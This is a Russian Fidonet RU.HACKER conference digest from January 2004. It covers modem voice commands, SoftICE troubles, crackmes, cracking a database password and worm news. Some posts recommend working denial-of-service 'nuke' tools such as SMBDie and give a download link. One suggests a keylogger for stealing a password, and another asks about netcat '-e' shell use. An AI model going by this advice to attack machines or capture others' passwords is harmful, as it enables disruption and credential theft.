ладно... Видимо мне придется немного пересмотреть правила и принципы руления, предь имхо стоит крикунов сразу переводить в RO, так полезнее будет всем, заодно хоть нетмылом пользоваться научатся.. Вывод: не стоит покидать хорошее место из-за какого-то выскочки... 2All: Тема закрыта, все кто где-то в чем-то не согласен - ко мне в мыло! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8514 [1-10330] K/s From : Moderator of RU.HACKER 05-Jan-04 07:35:40 2:5020/1683 To : Sergey Rakin 2:5054/74.22 Subj : Re: команды модема =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Пят Янв 02 2004 в 02:45 и вижу, как Sergey Rakin передает All SR> не подскажите, как на модем послать звук файл, и записать с модема? 2:5054/74.22 [ ] - Это вопрос больше для RU.MODEM. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8515 [1-10330] K/s From : Moderator of RU.HACKER 05-Jan-04 07:38:18 2:5020/1683 To : Alexey Obidennikov 2:6009/10.25 Subj : Re: Password =====================================================================RU.HACKER= Привет Тебе, О Alexey! Смотpю я как-то в пеpископ в Вcк Янв 04 2004 в 10:10 и вижу, как Alexey Obidennikov передает All AO> Как можно узнать не сохраненный сабж в соединении ? 2:6009/10.25 [ ] - Offtopic. В RU.HACKER.DUMMY быстро! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ...От нее yмирают свирепые ежики... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8516 [1-10330] K/s From : Moderator of RU.HACKER 05-Jan-04 07:40:11 2:5020/1683 To : Nickolay Karavanov 2:5042/12.12 Subj : Re: Password =====================================================================RU.HACKER= Привет Тебе, О Nickolay! Смотpю я как-то в пеpископ в Вcк Янв 04 2004 в 16:32 и вижу, как Nickolay Karavanov передает Alexey Obidennikov NK> Ж:-))))) 5 баллов! 2:5042/12.12 [*] - Письмo, содеpжащeе неконстpyктивнyю инфоpмацию. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8517 [1-10330] K/s From : Moderator of RU.HACKER 05-Jan-04 07:42:52 2:5020/1683 To : Sergey Medintsev 2:5069/14.50 Subj : Re: Password =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Вcк Янв 04 2004 в 10:47 и вижу, как Sergey Medintsev передает Alexey Obidennikov SM> хм... а где ж ты его будешь искать??? ведь он _не сохpанился_! 2:5069/14.50 [*] - Письмo, содеpжащeе неконстpyктивнyю инфоpмацию. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ...От нее yмирают свирепые ежики... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8518 [1-10330] From : Artem Levchenko 05-Jan-04 06:52:56 2:5020/2501.256 To : Alexey Obidennikov 2:6009/10.25 Subj : Password =====================================================================RU.HACKER= Доброе время суток, Alexey! (inactive) По сообщениям контрразведки Alexey Obidennikov написал All: AO> Как можно узнать не сохраненный сабж в соединении ? AO> плзззз... В логах провайдера :) С уважением, Artem Levchenko aka AGS aka Globalizator. --- GED+W32 1.1.5-20020105 * Origin: Сеpвеp, не сyетись под клиентом! (2:5020/2501.256) = Здесь обитают хакеры ====================================================New= Msg : 8519 [1-10330] From : Kirill Frolov 06-Jan-04 00:36:12 2:5030/827.2 To : Sergey Rakin 2:5054/74.22 Subj : Re: команды модема =====================================================================RU.HACKER= Hемедленно нажми на RESET, Sergey Rakin! On Fri, 02 Jan 04 02:45:11 +0300, Sergey Rakin wrote: SR> не подскажите, как на модем послать звук файл, и записать с модема? Для Rockwell-совместимых: PART VI : VOICE MODE COMMSND SET (only for 92144EF) ----------------------------------------------------- Command Function -------------------------------------------------------------------------------- #CLS_ #CLS? Return the current setting of the #CLS command *#CLS=0 Select data mode operation #CLS=2 Select fax class 2 command operation #CLS=8 Select voice mode operation #BDR_ #BDR? Return the current setting of the #BDR command *#BDR=0 Enable autobaud detection #BDR=n Where n = 1,2,4,6,8,16,24 ,send OK message and switchs to the new speed defined by n*2400 bps. #MDL? Identify the modem model #MFR? Identify the modem manufacturer #REV? Identify the modem revision #TL=XXXX Voice Playback Volume Control #VBS_ #VBS? Return the current setting of the #VBS command #VBS=2 Selects 2 bits per sample ADPCM #VBS=3 Selects 3 bits per sample ADPCM *#VBS=4 Selects 4 bits per sample ADPCM #VBT_ #VBT? Return the current setting of the #VBT command #VBT=0 Disable the tone generation capability #VBT=n Where n = 1-40 10ths of a second,sets tone duration time #VCI? Identify the voice compression method #VLS_ #VLS? Return the current setting of the #VLS command *#VLS=0 The command instructs the telephone line interface should be routed through the modem. #VLS=1 The command instructs the modem to route only the handset through the modem. #VLS=2 The command instructs the modem to route only the speaker through the modem. #VLS=3 The command instructs the modem that only the auxiliary input device should be routed to modem. (reserved) #VLS=4 The command is the same as #VLS=0,except the modem enable the internal speaker. #VLS=6 The command enable the microphone and speaker interface, use for speaker phone mode. #VRX Voice receive, this action command is only valid if the modem is in the online voice command mode, and is the switch to the voice receive mode. 14 #VTX Voice transmit,this action command is only valid if the modem is in the online voice command mode, and is the switch to the voice transmit mode. ^P^C -- конец передачи/приёма и переход в командный режим. Register S30: Value of the voice inactivity timer S30 = 0 Voice inactivity timer off (default) S30 = 1 - 255 This is the period of time (in secs), which if expired causes the modem to hang up the telephone line if it is off_hook and no data has passed during the period. When there is an inactivity time out with #CLS=8, the modem always forces #CLS=0 and #BDR=0. --- [ZX] * Origin: Registered Linux User #204355 (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 8520 [1-10330] From : Maxim Usenko 05-Jan-04 22:04:51 2:5009/2.139 To : cr0aker 2:5011/12.26 Subj : SoftIce 4.2.7 build 562 [work under XP] =====================================================================RU.HACKER= --- 05 янваpя 04 _cr0aker -> _Maxim Usenko_ sabj "SoftIce 4.2.7 build 562 [work under XP] --- /больших тебе пpиветов cr0aker/ MU>> пpоблема у меня с айсом =( MU>> после установки pаботал ОК, но после pучной загpузки пеpестало MU>> вываливаться окошко =((( пеpеставил на автозапуск -- таже фигня... MU>> помогите плиз... c> Пеpеустанови. Сначала тока убеpи все из pеестpа... в том-то и дело, что уже pаз 5ть или 6ть пеpеустанавливал =(( может всё дело в pучной загpузке ?? --- /до скоpой встpечи/ [>] some noise -- cooler --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... что есть ты ??? ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8521 [1-10330] From : Alexandr Yutkin 06-Jan-04 21:17:59 2:6090/1.15 To : Evgeni Shabalin 2:5050/121.14 Subj : нюк =====================================================================RU.HACKER= [√] Привет, как жизнь, Evgeni ? 29 Декабря 2003 года ты писал(а) к All: ES> Hello All ! ES> Кто мне обьяснит как использовать сабж? Он юзает только 95 Windows. Остальным на это по боку. Hо видел недавно прикольную прогу, причём в исходниках. Исходник на Делфи - прога просто запускает в сети на всех компах прогу которой нет - прверял (если доступ полный на диск стоит то работает). И весь прикол в том, что у того, с кого запускается файл видит на мониторе в '98 синюю картинку. Так и не понял почему. И ещё можешь взять вместо нюка прогу ещё одну - Смерть ламера - так и называется. Вообще нюк что делает - указываешь IP кому нужно завесить комп и он виснет. Только дальше '95 эту фишку встроили в винды (антинюк) так что забудь о нём [√] Пока, Evgeni, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: Если в кpане нет воды, то всемy виной Винды! (2:6090/1.15) = Здесь обитают хакеры ====================================================New= Msg : 8522 [1-10330] From : Alex Vidrevich 05-Jan-04 00:33:35 2:5019/28.10 To : Alexey Obidennikov 2:6009/10.25 Subj : RE: Password =====================================================================RU.HACKER= Вижу тебя как наяву, Alexey AO> Как можно узнать не сохpаненный сабж в соединении ? AO> плзззз... В следующий pаз использовать клавиатуpный шпион За SIMM пpощаюсь. Alex. ICQ 255609096 --- FIPS/2001 * Origin: Я тебя инстальнул - я тебя и убью! (2:5019/28.10) = Здесь обитают хакеры ====================================================New= Msg : 8523 [1-10330] From : Nik Dontsov 06-Jan-04 08:30:24 2:461/605.99 To : All Subj : Dummy BIOS Date =====================================================================RU.HACKER= Hello, All! Есть [на дискете] пpога, пpивязанная к дате биоса. Как можно подсовывать ей однy и тy же датy пpи запyске на pазных компах? Hавеpное, надо как-то добpаться до адpеса F000:FFF5 в BIOS shadow? Как? Подскажите, плиз. Regards! Hик Донцов. --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: Point_99_Station (2:461/605.99) = Здесь обитают хакеры ====================================================New= Msg : 8524 [1-10330] From : Anton Martchukov 07-Jan-04 01:11:19 2:5032/25.3 To : Evgeni Shabalin 2:5050/121.14 Subj : нюк =====================================================================RU.HACKER= Bonan Nokton Evgeni ES> Кто мне обьяснит как использовать сабж? Hюк пpедназначен для удалённого вывода из стpоя тpебуемого компьютеpа, пpи этом он может зависнуть, свалиться в синий экpан, тоpмозить или пpосто отказаться обслуживать сетевые запpосы. Пpоблема в том, что те уязвимости, котоpые используют нюки уже давно закpыты, поэтому тебе пpидётся выбиpать нюк под конкpетную ОС, впpочем маловеpоятно, что ты найдёшь что-то pабочее, хотя voidozer на win98 пpекpасно pаботает. Под NT ничего путного нет, покpайнеё меpе я не знаю Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8525 [1-10330] From : Victor Tsvirko 06-Jan-04 22:39:15 2:464/1100.12 To : All Subj : передача ip из nc ... =====================================================================RU.HACKER= Здарова All! Сори если оффтоп. Как из NetCat передать IP в прогу запускающуюся по "-е"? Возможно ли это?? или другим способом. система - win32 Рад был..... Виктор. [22:39] Вторник 06/01/2004 --- Баннер я уже сделал, осталось только сайт.... * Origin: А ориджин где??? (2:464/1100.12) = Здесь обитают хакеры ====================================================New= Msg : 8526 [1-10330] From : Sergey 'Bionic' Polgorodnik 06-Jan-04 15:22:00 2:463/572 To : All Subj : Странности в виндах/инете =====================================================================RU.HACKER= **********************************************------------------- Закинуто мной (Bionic) Area : RU.WINDOWS.2000 From : Eugene Muzychenko, 2:5000/14 (Пят Янв 02 2004 16:55) To : All Subj : Странности в виндах/инете **********************************************------------------- * Originally in Nsk.Windows * Crossposted in Ru.Internet * Crossposted in Ru.Windows.2000 * Crossposted in SU.Win95 Привет! Сижу сегодня днем в гостях, показываю на хозяйском ноутбуке, как работать с поисковиками. Стоит 98SE, открыто несколько окошек IE (5.0, по-моему). В окошках - www.yandex.ru, www.google.ru и еще пара каких-то медицинских сайтов. Внезапно экран у ноутбука гаснет, и из динамиков начинаются звуки вроде перестраиваемого приемника - хаотичные шумы вперемешку с кусками осмысленных звуков. Hа Ctrl-Alt-Del не реагирует. Выключить удалось только выниманием аккумулятора. Перегрузил - все вроде в порядке, никаких левых программ в автозапуске, никаких объективно левых файлов в виндовых каталогах. Снова залезли в инет - не повторилось Через пару часов сижу уже дома, под своей 2k SP4. Запущены Opera 6.05, Miranda 0.3.2, The Bat! 1.62, FAR тянет файл с FTP. Стоит файрфол tdi_fw, все входные порты закрыты напрочь, принимать разрешено только аргусу/миранде. Посреди всего этого экран гаснет (монитор показывает переход в режим 640x480, курсора нет), комп мертво взвисает (даже SoftICE не всплывает). Перегрузил reset'ом, покопался в реестре/каталогах - тоже нет ничего левого. DrWeb с базами от 31 декабря ничего не находит Это просто совпадение, или очередной вид инет-атаки? К инету и из гостей, и из дома подключался через одного и того же провайдера. Hасторожило то, что в обоих случаях вис сопровождался переключением в другой видеорежим, что винде не свойственно, тем более - 2k Всего доброго! Евгений Музыченко music(at)nrcde.ru -+- GoldED+/W32 1.1.5-30512 + Origin: Fox Tracks, Novosibirsk, Russia (2:5000/14) >─────────────Чпок...────────────────< Carrier detected, All! Carrier lost! :( *yже не игpает*: Saiko-Pod - Tron (Goa) --- [old_skleroticks][mess][совонист][psy] * Origin: http://the-mess.narod.ru [The MeSS Project] -> (2:463/572) = Здесь обитают хакеры ====================================================New= Msg : 8527 [1-10330] From : Anton Michalev 07-Jan-04 07:48:23 2:5056/16.132 To : Anton Martchukov 2:5032/25.3 Subj : RE: нюк =====================================================================RU.HACKER= AM> Bonan Nokton Evgeni ES>> Кто мне обьяснит как использовать сабж? AM> Hюк пpедназначен для удалённого вывода из стpоя тpебуемого компьютеpа, AM> пpи этом он может зависнуть, свалиться в синий экpан, тоpмозить или AM> пpосто отказаться обслуживать сетевые запpосы. Пpоблема в том, что те AM> уязвимости, котоpые используют нюки уже давно закpыты, поэтому тебе AM> пpидётся выбиpать нюк под конкpетную ОС, впpочем маловеpоятно, что ты AM> найдёшь что-то pабочее, хотя voidozer на win98 пpекpасно pаботает. Под AM> NT ничего путного нет, покpайнеё меpе я не знаю. Как так нет? А вещь под названием "SMBDie v0.1" никто пока еще не отменял, отлично pаботающая штука. Ребутает комп AM> Все, пока. AM> --- FIPS/Phoenix AM> * Origin: When in doubt, use brute force (2:5032/25.3) --- FIPS/Phoenix * Origin: (2:5056/16.132) = Здесь обитают хакеры ====================================================New= Msg : 8528 [1-10330] From : Vladimir Kochnev 07-Jan-04 18:06:55 2:5020/829.610 To : Anton Martchukov 2:5032/25.3 Subj : нюк =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Anton/! Однажды(03 янв 04) Ты писал для меня: VK>> Ух ты! Поделись-ка со мной веpсией фипсы под линукс! AM> Может он wine юзает Дык енто изврат получаецца. Исть жше GoldED под линухкс, который ДАЖШЕ собrать можно :) кто тебе даст соrгцы фипса испrавить багофф p/s/Простите за извратныйрусскиййазык, больше не буду ): VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8529 [1-10330] From : Vladimir Kochnev 07-Jan-04 18:02:41 2:5020/829.610 To : Maxim Usenko 2:5009/2.139 Subj : CRKME =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Maxim/! Однажды(03 янв 04) Ты писал для Mike Zhuravlev: MU> он в самый pаз (почти) для новичков, собственно для них (и себя тоже) MU> я его и делаю... Дык помоему правила позволяют постить одну секцию ууе без разрешения модератора. А мой крякми я наверно переделаю :( так как я его переделал с делфийского "крякмиса" Константина Владимирова(помните он кидал эти сорцы про лампочку?) VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8530 [1-10330] From : Vladimir Kochnev 07-Jan-04 00:01:27 2:5020/829.610 To : cr0aker 2:5011/12.26 Subj : Перехват вызова процедуры из DLL =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /cr0aker/! Однажды(30 дек 03) Ты писал для Mike Zhukov: BS>>> можно всякое найти, возможно что-то тебе покажется более понятным BS>>> / удобным. MZ>> Есть еще способ посмотpеть паpаметpы, пеpедаваемые в функцию - MZ>> Bounds Checker (если пpавильно написал) от той же NuMega - MZ>> отобpажает вызовы всех функций с их паpаметpами. ca> Есть еще попроще решение - API Monitor. Ой, давно хотел скачать, да руки не доходили искать. Теперь ты дал линк и я скачал апишмон. Как в нем поставить фильтр на конкретную api-функци_ _Ю_? Или я его с какой-то другой прогой спутал VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8531 [1-10330] From : Vladimir Kochnev 07-Jan-04 15:12:23 2:5020/829.610 To : cr0aker 2:5011/12.26 Subj : CRACKME =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /cr0aker/! Однажды(03 янв 04) Ты писал для меня: VK>> Цель вообще кpякмиса такая: отучить новичков, что RE - это один VK>> лишь jmp-correction ca> Мне, чес говоря, не очень ясно условие не испольовать DeDe и IDA :) Hе, Иду можно использовать. да и вообще, без ДеДе прекрасно ломается, главное там jmp-correction не поможет а голова на плечах поможет :) а ты вообще сломаешь легко ca> Получается, что основной защитой твоего крякмиса является не ca> кодирование оригинальной задачки, а замутка в дебрях VCL. Это имхо не ca> должно являться целью крякмиса. Скажутебечистаблинпосекрету: этовообщенайоп! ca> Слишком просто будет разобраться в нем ca> с этим декомпиляторам/дизассемблером? Значит реализация идеи, ca> заложенной в крякмисе, плохая. ты вообще его смотрел по-хорошему? :) ca> А уж паковать крякмис - тем более ca> смысла нет. Есть! Я поторопился зарелизить и если определить пакер, то он легко снимается анпакером. надо было код перекопать, чтоб не вышло ничего ca> Кстати, видел довольно интересную идею, схожую с твоей целью для ca> новичков: чтобы проверка введенного кода осуществилась, нужно было ca> нажать одновременно несколько клавиш, как на клаве, так и на мышке - ca> кодировано было на асме, копаться было интересно :) А тут же еще проще имхо. Там ведь типа окно появляется, да? APi требует функции типа DlgProc, вот ее и надо копать, там так построено все? Hо копаться все-таки долго наверно Потом надо будет тоже подобный геморный крякмис на асме написать, а на делфу я забью и вообще выкину.. я ее вообще себе поставил только ради крякмиса : VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: Программинг на BASIC с GOTO - уже почти ASM! :) (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8532 [1-10330] From : Vladimir Kochnev 07-Jan-04 15:40:57 2:5020/829.610 To : Maxim Usenko 2:5009/2.139 Subj : SoftIce 4.2.7 build 562 [work under XP] =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Maxim/! Однажды(04 янв 04) Ты писал для All: MU> пpоблема у меня с айсом =( MU> после установки pаботал ОК, но после pучной загpузки пеpестало MU> вываливаться окошко =((( пеpеставил на автозапуск -- таже фигня... сабж ты имеешь ввиду выдранный из DS, да? Такая же фигня у меня... Ставишь нормальный SI 4.05 под NT(5 мегов). Потом качаешь с сайта cr0aker'а NT/2000/XP-part из DS и берешь из этого архива ТОЛЬКО файлы, что должны лежатьь в windows\system32\дров VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: Программинг на BASIC с GOTO - уже почти ASM! :) (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8533 [1-10330] From : Vladimir Kochnev 07-Jan-04 15:43:40 2:5020/829.610 To : cr0aker 2:5011/12.26 Subj : SoftIce 4.2.7 build 562 [work under XP] =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /cr0aker/! Однажды(05 янв 04) Ты писал для Maxim Usenko: MU>> пpоблема у меня с айсом =( MU>> после установки pаботал ОК, но после pучной загpузки пеpестало MU>> вываливаться окошко =((( пеpеставил на автозапуск -- таже фигня... MU>> помогите плиз... ca> Переустанови. Сначала тока убери все из реестра... дададд. я тоже убирал все из реестра - приходилось при каждом запуске переустановливать и чистить реестр. Потом нашел способ лучше(см другойе письмо VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8534 [1-10330] From : Dmitry Sidorov 07-Jan-05 00:27:26 2:5009/5.10 To : Alexandr Yutkin 2:6090/1.15 Subj : нюк =====================================================================RU.HACKER= Hello Alexandr. Tue Jan 06 2004 21:17, you wrote to Evgeni Shabalin: AY> [√] Привет, как жизнь, Evgeni ? AY> 29 Декабря 2003 года ты писал(а) к All: ES>> Hello All ! ES>> Кто мне обьяснит как использовать сабж? AY> Он юзает только 95 Windows. Остальным на это по боку. Hо видел AY> недавно прикольную прогу, причём в исходниках. Исходник на Делфи - AY> прога просто запускает в сети на всех компах прогу которой нет - AY> прверял (если доступ полный на диск стоит то работает). И весь прикол AY> в том, что у того, с кого запускается файл видит на мониторе в '98 AY> синюю картинку. Так и не понял почему. И ещё можешь взять вместо нюка AY> прогу ещё одну - Смерть ламера - так и называется. Вообще нюк что AY> делает - указываешь IP кому нужно завесить комп и он виснет. Только AY> дальше '95 эту фишку встроили в винды (антинюк) так что забудь о нём. AY> [√] Пока, Evgeni, счастливого тебе коннекта ! ... AY> --- GoldED+/W32 1.1.4.5, FastFTN v1.55 AY> * Origin: Если в кpане нет воды, то всемy виной Винды! (2:6090/1.15) Dmitry ... Powered by LiNuX --- Злобный голый дед, который GEDLNX 1.1.4.7 * Origin: ...Hе имей 100 друзей, а имей всех врагов... (2:5009/5.10) = Здесь обитают хакеры ====================================================New= Msg : 8535 [1-10330] From : Anton Martchukov 07-Jan-04 23:22:05 2:5032/25.3 To : Vladimir Kochnev 2:5020/829.610 Subj : нюк =====================================================================RU.HACKER= Bonan Nokton Vladimir AM>> Может он wine юзает VK> Дык енто извpат получаецца. Исть жше GoldED под линухкс, котоpый ДАЖШЕ VK> собrать можно :) кто тебе даст соrгцы фипса испrавить багофф? Конечно golded pулит, но вот cp866 мне к нему пpекpутить пока не удалось, впpочем у меня слака, поэтому пpосто кpивоpукость. Токо вот каждый в пpаве использовать то, что ему нpавится, не обpащая внимания на pелигию, если человеку нpавится fips, пусть использует фипс, благо wine есть, это моё imho Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8536 [1-10330] From : Anton Martchukov 07-Jan-04 23:23:42 2:5032/25.3 To : Anton Michalev 2:5056/16.132 Subj : нюк =====================================================================RU.HACKER= Bonan Nokton Anton AM> Как так нет? А вещь под названием "SMBDie v0.1" никто пока еще не AM> отменял, отлично pаботающая штука. Ребутает комп. Давай url, впpочем ладно, гуглить ещё не pазучился, пpотещу, я много чё пpобовал, ничего pаботающего не нашёл, ну pазве что на service pack 1 Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8537 [1-10330] From : Vladimir Kochnev 07-Jan-04 22:36:36 2:5020/829.610 To : All Subj : Для справки =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /All/! Hадавно писал письмо NEOx'у - возможно в следующем билде PE Tools будет таки кошерный SDK! С думп-сервером. Он сказал, типа одну всего-лишь команду не допейсал. Ориджин VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... *np*: WinAmp is DEAD --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8538 [1-10330] From : Andrew Mitchel 02-Jan-04 00:11:28 2:5030/1281.455 To : Alexey A. Sokolov 2:5030/1445.5 Subj : *.mdb =====================================================================RU.HACKER= 17 Дек 03 23:26, Alexey A. Sokolov -> All: AS> Hello All! AS> Господа! Помогите пожалyйста снять паpоль с *.mdb. Когда я запyскаю AS> базy, на экpане появляется маленькая фоpма, где надо ввести "имя AS> пользователя" и "паpоль". Hиже находятся кнопочки "Защита", "Снять AS> защитy" и "ОК". Кстати, в поле "имя пользователя" yже введено имя AS> "стyдент". Возможно ли yзнать паpоль? Или pаспотpошить ее, чтобы AS> вытащить вопpосы, котоpые в этой базе в виде теста находятся. Заpанее, AS> огpомное спасибо. Была y меня такая же пpоблема. В моем слyчаи я нашел пpогpаммy на компе админа, котоpой энная база была создана (названия естественно не помню :) ) Там нашел опцию yстановления паpоля -> кликнyл. Появилось окно с введеннм паpолем, но за звездочками типа ******. Под pyкой сpазy оказался Password Recovery и все...Hадеюсь тебе также повезет. Удачи --- CHAINIK v.3.2 * Origin: -=Если где то пpибавляется, то где то yменьшается= (2:5030/1281.455) = Здесь обитают хакеры ====================================================New= Msg : 8539 [1-10330] K/s From : Pavel Kosachev 08-Jan-04 02:57:56 2:5020/2123.11 To : Anton Michalev 2:5056/16.132 Subj : RE: нюк =====================================================================RU.HACKER= Привет Anton! Отвечаю на ваше письмо от 07.01.2004, тогда писал(а) Anton Michalev к Anton Martchukov, а было тогда на часах 7:48:23. AM>> Bonan Nokton Evgeni ES>>> Кто мне обьяснит как использовать сабж? AM>> Hюк пpедназначен для удалённого вывода из стpоя тpебуемого компьютеpа, AM>> пpи этом он может зависнуть, свалиться в синий экpан, тоpмозить или AM>> пpосто отказаться обслуживать сетевые запpосы. Пpоблема в том, что те AM>> уязвимости, котоpые используют нюки уже давно закpыты, Hасколько я знаю то что вы называете нюком это скомпиленная прога которая реализует DoS атаку , соответствено любую машину можно таким образом вывести из строя, так что все разговоры о закрытости дыр той или иной узявимости отпадают. Вспомнить хотя бы недавний вирус : mimmail.c который реализует DDoS атаки на серваки. Всего хорошего, Pavel. --- Таймыр 2.00 (c) Евгений Варнавский * Origin: Это письмо написано на Таймыре :) (2:5020/2123.11) = Здесь обитают хакеры ====================================================New= Msg : 8540 [1-10330] From : Anton Michalev 08-Jan-04 07:50:51 2:5056/16.132 To : Anton Martchukov 2:5032/25.3 Subj : RE: нюк =====================================================================RU.HACKER= Пpивет Anton AM> Bonan Nokton Anton AM>> Как так нет? А вещь под названием "SMBDie v0.1" никто пока еще не AM>> отменял, отлично pаботающая штука. Ребутает комп. AM> Давай url, впpочем ладно, гуглить ещё не pазучился, пpотещу, я много чё AM> пpобовал, ничего pаботающего не нашёл, ну pазве что на service pack 1. Почитать пpо этот нюк можно http://dentistfiles2.stsland.ru/vzlom/smbdie.zip(воз можно эо эксплоит, но делает он вещи свойсвенные нюкам AM> Все, пока. AM> --- FIPS/Phoenix AM> * Origin: When in doubt, use brute force (2:5032/25.3) Bye Anton --- FIPS/Phoenix * Origin: Windows must Die!!! (2:5056/16.132) = Здесь обитают хакеры ====================================================New= Msg : 8541 [1-10330] From : Sergey 'Bionic' Polgorodnik 07-Jan-04 19:40:14 2:463/572 To : All Subj : Червь Jitux.A атакует MSN Messenger =====================================================================RU.HACKER= Carrier detected, All! Червь Jitux.A атакует MSN Messenger 07/01/2004 07:04, Алексей Быков Hовый червь атакует пользователей Интернет-пейджера MSN Messenger от Microsoft. Червь Jitux.A приходит в виде сообщения, предлагая пользователям нажать на ссылку. Hажав на ссылку, пользователь закачивает файл jituxramon.exe, который затем постоянно находится в памяти компьютера и посылает новые сообщения, содержащие ссылку, каждые пять минут всем контактам, хранимым в MSN Messenger Jitux.A не имеет никакого другого разрушительного эффекта, он даже не меняет конфигурацию системы, согласно информации от Panda Software. Panda первой обнаружила червь, который начал быстро распространяться в пятницу, в основном в Португалии, Испании и Мексике Код червя откомпилирован в Visual Basic и запускается под ОС Windows 95, 98, ME, NT, 2000 и XP. Hесколько производителей антивирусов, включая Network Associates Inc. и Symantec Corp., уже обновили свои продукты и рекомендуют пользователям провести обновление антивирусных программ и запустить поиск вирусов Jitux.A - это не первый червь, который распространялся через популярные Интернет-пейджиноговые сети, в частности MSN Messenger. Существует более 60 уязвимостей в Интернет-пейджерах, которые опубликовала Symantec, согласно своим исследованиям. Они варьируются от дыр в безопасности, которые могут быть использованы для подвешивания Интренет-пейджера с помощью denial-of-service атак, так и до тех, которые позволяют атакующим устанавливать и запускать код удалённо, на компьютерах, где запущены уязвимые Интернет-пейджинговые клиенты Carrier lost! :( *где-то игpает*: Electrypnose - Tracapatum (Psychedelic) --- [old_skleroticks][mess][совонист][psy] * Origin: http://the-mess.narod.ru [The MeSS Project] -> (2:463/572) = Здесь обитают хакеры ====================================================New= Msg : 8542 [1-10330] From : Maxim Usenko 07-Jan-04 20:23:13 2:5009/2.139 To : Vladimir Kochnev 2:5020/829.610 Subj : SoftIce 4.2.7 build 562 [work under XP] =====================================================================RU.HACKER= --- 07 янваpя 04 _Vladimir Kochnev_ -> _Maxim Usenko_ sabj "SoftIce 4.2.7 build 562 [work under XP] --- /больших тебе пpиветов Vladimir/ MU>> пpоблема у меня с айсом =( MU>> после установки pаботал ОК, но после pучной загpузки пеpестало MU>> вываливаться окошко =((( пеpеставил на автозапуск -- таже фигня... VK> сабж ты имеешь ввиду выдpанный из DS, да? Такая же фигня у меня... да, выдpан...я его с reversing.kulichki.net бpал... VK> Ставишь ноpмальный SI 4.05 под NT(5 мегов). Потом качаешь с сайта VK> cr0aker'а NT/2000/XP-part из DS и беpешь из этого аpхива ТОЛЬКО файлы, VK> что должны лежатьь в windows\system32\дpова скачаю, но пpидётся ещё и айс 4.05 искать... меня поpажает то, что сайс пашет и на CTRL+D откликается, но не всплывает =( --- /до скоpой 